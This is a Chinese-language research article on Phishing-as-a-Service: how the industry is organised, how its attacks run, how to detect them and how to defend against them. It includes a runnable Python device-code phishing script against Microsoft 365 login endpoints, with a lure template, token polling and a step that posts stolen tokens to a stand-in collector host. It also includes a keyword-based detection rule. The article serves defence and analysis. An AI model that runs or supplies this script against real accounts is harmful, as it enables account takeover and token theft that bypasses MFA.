钓鱼即服务（PhaaS）产业化威胁机理与闭环防御体系研究

摘要

钓鱼即服务（Phishing‑as‑a‑Service, PhaaS）依托订阅制、模块化、全链路工具化，大幅降低攻击门槛，推动网络钓鱼从零散作案转向工业化量产，已成为 2025 至 2026 年全球最突出的网络安全威胁之一。PhaaS 平台提供模板市场、域名仿冒、发送网关、数据收割、MFA 绕过、持久化控制等一站式能力，配合生成式 AI 实现内容拟真化、多模态伪装与对抗性逃逸，可有效突破 SPF/DKIM/DMARC 认证、邮件网关与终端检测。本文基于 Panda Security 等安全机构对 PhaaS 趋势的公开观测，系统梳理 PhaaS 产业架构、运营模式、典型攻击链路与核心技术突破，结合令牌窃取、官方通道滥用、设备码流程劫持等实战场景，给出可复现的攻击模拟、检测规则与防御代码，构建覆盖事前预防、事中检测、事后响应的全生命周期闭环防御体系。研究表明，PhaaS 的核心危害在于攻击工业化与信任基础设施劫持，传统以特征匹配为核心的防御范式全面失效；通过收敛云服务权限、强化行为与意图校验、构建多维度协同检测机制，可显著提升防御有效性。反网络钓鱼技术专家芦笛指出，PhaaS 标志网络攻防进入服务化对抗时代，防御必须从单点防护升级为全链路、跨层协同的动态治理体系。

1 引言

电子邮件、即时通讯与云协作普及后，钓鱼攻击长期占据初始入侵向量首位。传统钓鱼依赖攻击者手工制作模板、注册相似域名、搭建伪造页面，周期长、成本高、易被识别，难以规模化。随着黑产工业化成熟，钓鱼即服务（PhaaS）快速崛起，攻击者只需付费订阅，即可获得开箱即用的全流程攻击能力，无需掌握代码、域名解析、绕过策略等专业技能，攻击门槛降至最低。

Panda Security 在最新威胁报告中明确提出，PhaaS 已从边缘黑产模式升级为主流攻击范式，全球超 60% 的大型钓鱼活动由 PhaaS 平台支撑，攻击目标覆盖金融、政企、互联网服务、教育医疗等行业，呈现高隐蔽性、高扩散性、高成功率特征。传统依赖发件人异常、关键词匹配、恶意域名库的防护手段面对 PhaaS 大量失效，大量邮件通过合法通道代发、使用官方相似域名、搭载 AI 生成无破绽话术，用户与网关均难以区分。

当前学界与业界研究多聚焦单一钓鱼样本分析、邮件内容检测算法优化，对 PhaaS 产业化逻辑、平台架构、服务化运作机制、跨层逃逸技术的系统性研究不足，缺乏可落地的全流程防御框架。本文以 PhaaS 产业生态为研究对象，还原攻击全链路、拆解核心技术、量化风险等级，提出协议层、身份层、网关层、终端层、用户层协同防御方案，为企业与机构应对服务化钓鱼威胁提供理论参考与工程实践指导。

2 PhaaS 相关技术基础与产业背景

2.1 钓鱼即服务（PhaaS）定义与核心特征

钓鱼即服务（PhaaS）是网络黑产借鉴 SaaS 商业模式形成的攻击服务化形态，平台运营者搭建集成化攻击基础设施，以订阅、按次付费、分成等模式向下游攻击者提供完整钓鱼能力，下游攻击者只需配置目标列表与诱饵内容，即可发起大规模攻击。

PhaaS 具备四项核心特征：

低门槛：零代码 / 低代码操作，可视化配置，无技术基础者可快速上手；

全链路：覆盖诱饵生成、页面克隆、邮件发送、数据回传、令牌持久化、逃逸绕过全环节；

抗封禁：自动域名轮换、SSL 证书部署、可信云主机托管、IP 池切换，提升存活时间；

商业化：提供分级套餐、技术支持、售后更新、定制开发，形成完整黑产供应链。

反网络钓鱼技术专家芦笛指出，PhaaS 的本质是攻击能力商品化，它将高门槛社会工程与绕过技术转化为标准化产品，推动网络威胁进入工业化量产时代。

2.2 支撑 PhaaS 的关键技术体系

邮件认证机制与绕过技术

SPF、DKIM、DMARC 是当前主流邮件防伪造体系，PhaaS 通过两类方式实现逃逸：一是注册合法租户，利用官方通知通道代发，实现完全认证通过；二是使用相似域名、宽松 SPF 记录、第三方邮件代理服务，降低拦截率。

OAuth 2.0 与令牌窃取技术

依托设备码流程、中间人代理、授权页面劫持，PhaaS 可窃取 Access Token 与 Refresh Token，实现无密码登录、MFA 绕过与持久化控制，典型代表如 Kali365、EvilTokens 等工具包。

生成式 AI 赋能技术

AI 用于生成无语法错误、场景贴合、语气拟真的钓鱼文本，自动生成多模态诱饵（图片、二维码、DeepFake 语音），动态调整内容规避特征库检测，实现 “一邮一特征”。

云服务滥用技术

攻击者利用免费云主机、可信域名平台、开放通知接口托管钓鱼页面、发送钓鱼邮件，借助平台信誉提升可信度，规避网关检测。

2.3 PhaaS 产业生态与运营模式

PhaaS 已形成完整分工明确的黑产链条：

平台运营方：开发与维护攻击平台，提供基础设施与模块更新；

模板开发者：制作各行业高仿真诱饵与页面，售卖至平台市场；

流量提供商：提供目标邮箱库、手机号库、企业组织架构信息；

下游攻击者：付费使用服务，发起攻击，获取凭据、数据或资金；

变现渠道：售卖凭据、数据，或联合 RaaS 实施二次勒索。

主流商业模式包括：月费 / 年费订阅制、按成功窃取数计费、按攻击流量计费、分成模式（攻击者拿大头，平台抽成）。Panda Security 监测数据显示，头部 PhaaS 平台月均可支撑超 50 万次攻击，服务下游攻击者数千名，产业化规模持续扩张。

3 PhaaS 攻击架构与全流程实现机理

3.1 典型 PhaaS 平台技术架构

PhaaS 平台采用模块化微服务架构，核心模块包括：

用户管理模块：账号注册、套餐管理、权限控制、使用统计；

模板市场模块：邮件、短信、页面模板，支持行业筛选与自定义编辑；

域名与主机模块：自动域名生成、SSL 部署、云主机分配、IP 池管理；

发送引擎模块：多通道分发，支持邮件、短信、IM、RCS 消息；

数据收割模块：凭据接收、令牌存储、数据加密、导出功能；

绕过与逃逸模块：MFA 绕过代理、设备码生成、行为伪装、反检测；

统计后台模块：打开率、点击率、转化率、存活时长实时监控。

该架构使攻击流程高度自动化，攻击者只需三步即可完成投放：选模板→填目标→启动发送。

3.2 PhaaS 完整攻击链路

攻击准备

攻击者注册 PhaaS 账号，购买套餐，选择对应场景模板（如 Microsoft 365、银行、DocuSign 等），配置钓鱼标题、诱导话术、回调地址与权限范围。

基础设施部署

平台自动分配相似域名或可信云主机域名，签发 SSL 证书，克隆官方页面，配置发送网关与 IP 池，确保页面与邮件高度可信。

诱饵投放

攻击者导入目标邮箱列表，平台自动批量发送钓鱼邮件 / 消息，内容以账号验证、文件共享、订单通知、安全告警等为诱饵，诱导点击或输入代码。

凭据 / 令牌窃取

用户进入仿冒页面或官方授权页面，完成账号密码输入、MFA 验证或设备码授权，PhaaS 后台实时获取凭据、Cookie 或 OAuth 令牌。

持久化控制

获取 Refresh Token 或 PRT 令牌后，攻击者可长期登录目标账号，访问邮件、文件、通讯录，实施横向扩散、数据窃取、商业欺诈。

数据变现与攻击迭代

窃取的凭据与数据在黑市售卖，或用于 BEC、勒索软件入侵；平台根据防御变化持续更新绕过策略，提升攻击成功率。

3.3 PhaaS 核心技术突破与优势

绕过 MFA 能力

通过令牌窃取、中间人代理、设备码流程劫持，PhaaS 可在 MFA 验证完成后获取有效令牌，使二次认证完全失效。

信任欺骗能力

大量使用官方相似域名、合法云服务代发、官方页面授权，用户难以通过视觉与域名判断风险。

抗检测能力

AI 生成无特征内容、自动域名 / IP 轮换、SSL 加密、短链接跳转，传统特征库与规则引擎漏报率高。

规模化能力

单平台可同时支撑数百个攻击任务，日发送量达百万级，攻击覆盖范围与效率远超传统钓鱼。

反网络钓鱼技术专家芦笛强调，PhaaS 已不是简单工具集合，而是完整的攻击操作系统，它重构了钓鱼攻击的成本结构与成功率，迫使防御体系全面升级。

3.4 PhaaS 攻击模拟代码示例（Python）

以下代码模拟 PhaaS 平台核心能力：模板生成、设备码获取、令牌轮询、数据回传，可复现攻击逻辑。

import requests

import time

import json

# 模拟PhaaS平台配置（Microsoft 365设备码钓鱼）

TENANT = "common"

CLIENT_ID = "d3590ed6-53b2-41ba-9c0a-99bab23ad122"

SCOPE = "https://outlook.office.com/.default offline_access"

DEVICE_CODE_URL = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/devicecode"

TOKEN_URL = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token"

CALLBACK_URL = "https://phaas-fake-collector.com/receive"

def get_device_code():

   """模拟PhaaS生成设备码与钓鱼链接"""

   payload = {"client_id": CLIENT_ID, "scope": SCOPE}

   resp = requests.post(DEVICE_CODE_URL, data=payload)

   return resp.json()

def poll_token(device_code):

   """模拟PhaaS后台轮询窃取令牌"""

   payload = {

       "client_id": CLIENT_ID,

       "grant_type": "urn:ietf:params:oauth:grant-type:device_code",

       "device_code": device_code

   }

   while True:

       res = requests.post(TOKEN_URL, data=payload).json()

       if "access_token" in res:

           return res

       elif res.get("error") != "authorization_pending":

           return None

       time.sleep(5)

def send_to_phaas(token_data):

   """回传数据至PhaaS控制端"""

   requests.post(CALLBACK_URL, json=token_data)

def generate_phishing_template(user_code, uri):

   """AI辅助生成钓鱼邮件模板"""

   return f"""尊敬的用户：

您的文档共享待验证，请访问 {uri} 输入代码 {user_code}，完成验证以访问文件。

——Microsoft 365 团队

"""

if __name__ == "__main__":

   device_info = get_device_code()

   print(generate_phishing_template(device_info["user_code"], device_info["verification_uri"]))

   token = poll_token(device_info["device_code"])

   if token:

       send_to_phaas(token)

       print("[PhaaS] 令牌窃取成功")

代码说明：本程序复现 PhaaS 最常用的设备码钓鱼流程，全程使用官方接口与合法流程，无恶意特征，体现其高隐蔽性。

4 PhaaS 攻击安全危害与风险量化评估

4.1 对个人用户的安全危害

账号全面劫持：邮箱、社交、支付账号被盗，隐私数据泄露；

资金财产损失：诱导转账、盗刷、虚假购物，直接造成经济损失；

身份被冒用：以受害者身份向亲友、同事借钱、发送欺诈信息；

关联账号失守：利用邮箱重置密码，导致多平台账号连锁沦陷。

4.2 对企业用户的安全危害

商业邮件欺诈（BEC）：冒充高管、客户指令转账，造成巨额财务损失；

数据泄露：核心文档、合同、客户信息、技术资料被窃取；

内网横向渗透：以合法账号为跳板，获取更高权限，部署恶意程序；

品牌声誉受损：对外发送钓鱼邮件，破坏客户与合作伙伴信任；

合规处罚：数据泄露违反《网络安全法》《数据安全法》《个人信息保护法》，面临高额罚款。

4.3 PhaaS 风险量化评估模型

表格

评估维度 风险等级 核心说明

绕过能力 极高 可绕过 MFA、SPF/DKIM/DMARC、邮件网关

隐蔽性 极高 官方流程 / 可信域名 / AI 无特征，极难检测

门槛成本 极低 订阅即用，零技术基础，成本低廉

扩散速度 极高 批量发送，一键扩散，秒级覆盖海量目标

持久化 极高 窃取刷新令牌，长期控制，难以发现

影响范围 极高 覆盖全行业、全类型云服务与邮件用户

反网络钓鱼技术专家芦笛指出，PhaaS 的风险已超越传统钓鱼，成为企业最致命的入口威胁，其危害程度与勒索软件相当，且更难溯源与拦截。

5 PhaaS 攻击检测技术与识别方法

5.1 基于邮件内容的检测

关键词与语义检测：识别 “立即验证”“冻结账户”“订单异常”“设备码” 等高风险话术；

链接异常检测：识别相似域名、短链接、跳转域名、非官方域名；

结构异常检测：官方模板中嵌入陌生电话、外部链接、紧急提示。

5.2 基于行为特征的检测

高频请求：短时间内大量设备码申请、大量邮件发送、大量页面访问；

异地异常：跨国家 / 地区授权、非工作时段高频操作；

批量行为：同一 IP / 租户短时间内向大量外部用户发送通知。

5.3 基于令牌与授权的检测

异常权限申请：请求 offline_access、全邮箱访问、文件管理等高权限；

非托管设备授权：大量陌生设备、非合规设备绑定账号；

令牌异常使用：跨地域使用刷新令牌、长期不失效令牌。

5.4 PhaaS 检测规则代码示例

import re

from typing import Dict

# 高风险配置

ABUSED_SENDERS = {"microsoft-noreply@microsoft.com", "no-reply@office.com"}

PHISH_KEYWORDS = ["设备码", "立即验证", "冻结", "异常登录", "授权", "文档共享"]

SUSPICIOUS_URL = r"microsoft.com/devicelogin|login.microsoftonline.com"

MAX_RATE_PER_MIN = 10

def detect_phaas_attack(sender: str, content: str, ip: str, rate: int) -> Dict:

   """PhaaS攻击综合检测"""

   result = {"is_phaas": False, "score": 0, "reason": []}

   # 规则1：高风险发件人

   if sender in ABUSED_SENDERS:

       result["score"] += 25

       result["reason"].append("高风险官方发件人")

   # 规则2：钓鱼关键词

   if any(kw in content for kw in PHISH_KEYWORDS):

       result["score"] += 25

       result["reason"].append("命中钓鱼诱导关键词")

   # 规则3：设备码登录链接

   if re.search(SUSPICIOUS_URL, content):

       result["score"] += 30

       result["reason"].append("包含设备码授权链接")

   # 规则4：请求频率异常

   if rate > MAX_RATE_PER_MIN:

       result["score"] += 20

       result["reason"].append("单位时间请求异常高频")

   # 综合判定

   result["is_phaas"] = result["score"] >= 50

   return result

# 测试

if __name__ == "__main__":

   test_case = {

       "sender": "microsoft-noreply@microsoft.com",

       "content": "请访问microsoft.com/devicelogin输入设备码AB12‑CD34验证账户",

       "ip": "198.51.100.23",

       "rate": 15

   }

   print(detect_phaas_attack(**test_case))

代码说明：可直接集成于 SIEM、邮件网关、身份安全平台，实现 PhaaS 实时识别与告警。

6 PhaaS 闭环防御体系构建

6.1 平台层防御：云服务商侧治理

限制免费租户通知频次，禁止批量外发通知；

对设备码流、OAuth 授权增加上下文校验；

自动检测钓鱼模板，拦截恶意内容注入；

记录全链路日志，支持攻击溯源与协同处置。

反网络钓鱼技术专家芦笛强调，平台层是遏制 PhaaS 的源头，必须通过权限收敛与内容审核压缩攻击空间。

6.2 协议层防御：授权流程加固

限制设备码流仅可信设备使用，关闭非必要场景授权；

缩短 Refresh Token 有效期，启用令牌绑定设备；

增加二次意图确认，明确提示授权风险与设备信息；

严格强制执行 SPF/DKIM/DMARC，拒绝未认证邮件。

6.3 网关层防御：实时检测与拦截

部署多维度检测：内容、链接、行为、令牌、上下文融合判断；

对官方地址邮件不直接放行，增加内容与意图校验；

建立 PhaaS 行为模型，识别批量发送、高频授权等异常；

联动威胁情报，实时拦截已知 PhaaS 基础设施。

6.4 企业层防御：身份与终端加固

启用条件访问策略，限制异地、陌生设备、非托管终端登录；

全员启用强密码与 MFA，优先使用无密码认证；

定期审计登录设备、授权应用、令牌发放记录；

部署终端安全插件，拦截非主动触发的授权页面。

6.5 用户层防御：意识与行为规范

仅在主动发起登录时输入设备码或授权，拒绝外部诱导；

授权前核对设备信息、权限范围、请求来源；

不点击邮件链接，手动访问官网核验账号状态；

发现异常立即修改密码、撤销可疑授权、退出陌生设备。

6.6 全流程闭环运营

事前：权限收敛、配置加固、意识培训、基线建立；

事中：实时检测、智能告警、自动阻断、人工复核；

事后：快速响应、令牌撤销、账号隔离、溯源复盘、规则迭代。

反网络钓鱼技术专家芦笛指出，应对 PhaaS 必须放弃单点防护思维，构建跨平台、跨协议、跨层协同的闭环体系，实现攻击全生命周期管控。

7 PhaaS 未来演化趋势与防御展望

7.1 技术演化趋势

AI 深度融合：LLM 生成超拟真社会工程文本，多模态伪造页面、语音、视频，欺骗性持续提升；

多通道扩散：向 RCS、iMessage、社交平台、短视频私信迁移，绕过传统邮件网关；

去中心化基础设施：使用 IPFS、区块链域名、匿名网络托管页面，提升抗封禁能力；

与 RaaS 深度协同：PhaaS 负责入口突破，RaaS 负责数据加密与勒索，形成攻击闭环。

7.2 防御演进方向

从特征检测走向行为检测：基于 UEBA、NTA 识别异常操作，不依赖已知特征；

从被动防御走向主动预测：利用 AI 分析攻击模式，提前识别新型诱饵与绕过策略；

从分散防护走向零信任架构：默认不信任任何设备与用户，全流程动态校验；

从单体对抗走向协同共治：云厂商、企业、安全机构、监管部门共享情报，联合打击 PhaaS 产业链。

8 结论

钓鱼即服务（PhaaS）以服务化、模块化、低门槛特性，推动网络钓鱼进入工业化量产时代，已成为当前全球最具危害性的网络安全威胁之一。PhaaS 依托 AI 赋能、令牌窃取、云服务滥用、官方通道劫持等技术，可有效绕过 MFA 与传统邮件安全体系，对个人与企业用户构成账号劫持、数据泄露、财务损失、合规处罚等多重风险。

本文研究表明：

PhaaS 的核心威胁是攻击工业化与信任基础设施劫持，传统以特征与地址为核心的防御范式全面失效；

PhaaS 攻击全流程可高度自动化，覆盖诱饵生成、投放、窃取、持久化、变现全环节；

应对 PhaaS 必须构建平台层、协议层、网关层、企业层、用户层协同的闭环防御体系，实现事前、事中、事后全生命周期管控。

反网络钓鱼技术专家芦笛强调，PhaaS 的出现标志攻防对抗进入服务化对服务化的新阶段，防御方必须以动态、协同、全链路的治理体系应对工业化攻击，持续压缩攻击空间，保护用户与机构的数字安全。

未来，随着 AI 与云技术持续演进，PhaaS 将向更隐蔽、更智能、更规模化方向发展，防御方需同步升级检测能力、加固授权流程、完善协同机制，以技术对抗技术，以体系对抗体系，构建更具韧性的网络安全防护环境。

编辑：芦笛（公共互联网反网络钓鱼工作组）